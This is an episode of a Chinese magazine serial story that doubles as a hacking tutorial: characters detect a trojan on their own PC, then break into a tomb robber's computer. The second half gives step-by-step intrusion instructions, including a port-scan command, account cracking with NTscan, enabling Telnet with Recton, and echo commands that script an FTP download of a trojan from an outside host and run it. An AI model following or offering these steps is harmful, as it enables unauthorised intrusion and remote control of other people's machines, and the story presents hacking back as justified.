古迹疑云之云中斗法

新实力

2009年3月16日 第10期

府城遇阻 又陷疑云

云中府就在东子和教授两个人的脚底下,可时过境迁,如今的府城已经发生了翻天覆地的变化。要找到宝藏具体所在地,还得在拼接完整的地图中找线索,否则就如同大海捞针。

10-f03-1.jpg

刚到府城的东子和教授,立即在宾馆中展开对地图的研究。“咦,电脑怎么变得这么慢?”东子对电脑发起了脾气。不一会儿,只听硬盘发出一阵疯狂的“哗哗哗”声,仿佛有杀毒软件在后台自动进行扫描。“是不是电脑有问题?”没能破解地图,却又可能陷入危机的教授不禁紧张起来。

东子开始查看系统中当前的进程情况。打开任务管理器,并没有发现任何可疑的进程信息。此时硬盘灯依旧“呼呼”地闪烁着,“难道系统被……”东子开始怀疑电脑被人注入了木马。

他查看“性能”标签,发现系统中CPU的使用率变化非常大,很多时候占有率会从30%突然增加到100%。此外,系统栏中的网络图标也开始疯狂地闪烁。点击任务管理器窗口选择“联网”标签,从走势图中可以看到有大量的数据正在向外传输(图1)。可是此时的东子,并没有运行任何的网络程序。那么这些奇怪的数据流量又是从何而来的呢?莫非真是有木马!若真是这样,事态就严重了。盗墓者或许现在已经得知了拼合完整的地图,前往宝藏最终的所在地。

这时教授想到了他在大学的一个朋友小榕,他专攻信息安全,问问他或许可以得到帮助!经过一番电话指导,小榕给出了电脑多半已经中病毒的消息。这时东子和教授都感觉到事态的严重性,不敢耽误,请小榕连夜前来帮忙。

查明木马 小试身手

这究竟是一个什么样的木马程序?这个木马到底对电脑都干了些什么?为了弄个究竟,教授请到了他在大学里认识的好朋友、信息安全高手小榕来帮忙。

小榕打算通过Wsyscheck来进行分析判断。这究竟是一款什么样的软件呢?原来程序进程是分析木马过程中非常重要的一项,而Wsyscheck就是专门针对此编写的软件。

软件中,正规的系统进程用黑色进行显示,第三方的程序进程则用红色进行显示。而对于被线程插入的系统进程,程序就会通过粉红色显示。

不一会儿,软件就扫描完系统中的进程。可结果却让人意外,软件显示并没有发现任何可疑的程序进程(图2)。难道这个木马完全隐身了?如何才能揪出它呢?

10-f03-2.jpg

“再厉害的木马,都会有一个尾巴!”小榕坚定地说道,“而端口就是那个无法隐藏的尾巴!”原来木马程序本身也是一种网络程序,所以在使用的时候都会在系统里面打开端口。比如反弹连接的木马程序,首先在客户端系统打开一个特定的端口,然后等待服务端程序的自动连接,所以要找到这个木马,最好的方法就是监听端口。

侦探小提示:通常情况下,每一个木马程序都有一个特定使用的端口,这也是进行木马程序判断的非常有效的方法。端口分为“源端口”和“目的端口”两种,“目的端口”是正在和本机通信的远程计算机的端口,而“源端口”分主动打开的客户端口和被动连接的服务端口两种。

于是小榕马上点击“文件检查”中的“端口状态”,在列表中可以看到当前计算机系统中的端口列表信息。小榕经过认真的检测后,发现一个连接到2009端口的链接非常可疑(图3),因为黑客常常喜欢利用年号来作为木马连接的端口。

10-f03-3.jpg

侦探小提示:其中“本地IP”代表本机系统的IP地址,该地址后的“本地端口”数字就是开放的端口。而“远程IP”就代表远程系统的IP地址,该地址后的“远程端口”数字就是连接的端口。

于是他将连接到的IP地址复制下来,并打开一个IP地址查询网站,在网页中输入复制的IP地址,点击“查询”按钮显示这个地址对应的竟然就是“大同”。看来有些人还真是“锲而不舍”。想到这种情况,小榕首先将系统里面的木马程序,通过手工方法将其成功地进行了清除操作。

反戈一击 获得敌情

这入侵电脑的幕后黑手,到底是谁呢?他们到底知道多少关于宝藏的事情?难道宝藏已经被……东子和教授此刻惊出一身冷汗。在请来教授的朋友小榕后,他们开始了与入侵者的对抗,并进入了对方的电脑。当他们登录盗墓者的电脑时,一个巨大的秘密即将被揭开。

初探敌穴,漏洞入侵

知道电脑被人安装木马,并被监视后,东子和教授越来越感到事态的严重,他们急需弄清木马安装者的用意。为窥探个究竟,他们开始了反入侵之路。说到入侵,小榕首先想到使用系统漏洞,这是入侵中最常用的方法。他们利用的就是前段时间发现的MS08-067漏洞。

在此之前他们准备了一款具有远程控制的程序和一个用于存放木马程序的网络空间。首先将配置的控制软件上传到网络空间中,这样就可以获得一个控制程序的地址链接。然后下载并启动“狼牙抓鸡器”,首先设置IP地址和木马地址。所有的设置完成以后点击“开始”按钮(图4)。时间一秒秒过去,扫描结果终于出来了。但可惜的是远程系统并不存在MS08-067漏洞。

10-f03-4.jpg

一招不行,再换一招

看来此路不通,小榕不得不思考另一种方法。于是他先使用“S扫描器”对远程IP地址的135端口进行扫描:点击开始菜单中的“运行”命令,输入“cmd”打开命令提示符窗口,首先跳转到S扫描器存在的目录,并输入下面一段命令:S tcp 192.168.131.66 1-200 512 /save。这段命令表示扫描指定IP地址中的1到200端口,最大扫描线程数是512,该数值越大速度也越快(图5)。

10-f03-5.jpg

接着小榕打开S扫描器目录,其中的Result.txt存放着扫描到的信息。接着运行系统账号破解工具NTscan,在NTscan窗口中的“主机文件”中设置IP地址信息,接着选中“WMI扫描”这个选项,然后在扫描端口中设置为135,最后点击“开始”按钮就可以进行破解操作了(图6)。

10-f03-6.jpg

终于,远程电脑的一个账号被软件破解出来!东子和教授欣喜若狂。而小榕却专心致志地准备利用Recton来植入控制程序。

他运行Recton程序以后,点击窗口中的“种植者”按钮,将盗墓者的IP地址添加到“远程主机设置”选项中的IP地址处,然后输入破解的“用户名”和“密码”。选择控制程序上传的方式,创新提供了“IPC上传”和“HTTP下载”两种方式。

小榕选择的是“IPC上传”。点击Recton窗口中的“Telnet”按钮,输入连接信息后点击“快速执行”按钮,打开远程系统的Telnet功能。然后打开系统中的命令提示符窗口,利用Telnet命令来连接远程主机。

接着小榕打算上传木马,只见他在屏幕上打出以下一段代码:

echo open ftp.muma.net>>mm.txt

echo user>>mm.txt

echo 123456>>mm.txt

echo bin>>mm.txt

echo get muma.exe>>mm.txt (muma.exe为用户配置好并传到FTP空间的木马)

echo bye>>mm.txt

输入以上命令后,可以在对方的系统中建立一个名为mm.txt的文件。小榕首先使用“dir mm.txt”查看这个文件是否存在(图7)。接着输入“ftp -s:mm.txt”命令,不一会儿就把木马下载到对方的主机里面了。然后使用“run muma.exe”运行木马服务端,最终成功上传木马。

10-f03-7.jpg

接着打开控制程序对其进行连接,这样就可以对盗墓者的系统进行控制了。

成功地进入到对方的电脑,教授他们开始查看起电脑中的信息。东子发现教授的嘴竟然张得越来越大,许久才发出来一声“他们不是简单的盗墓者”,“看着盗墓者电脑里的信息,竟然也是追踪这个宝藏许多年,对这方面的研究竟然不逊色于我”。不一会,教授望着一个神秘文字大呼道:“他们可能是……”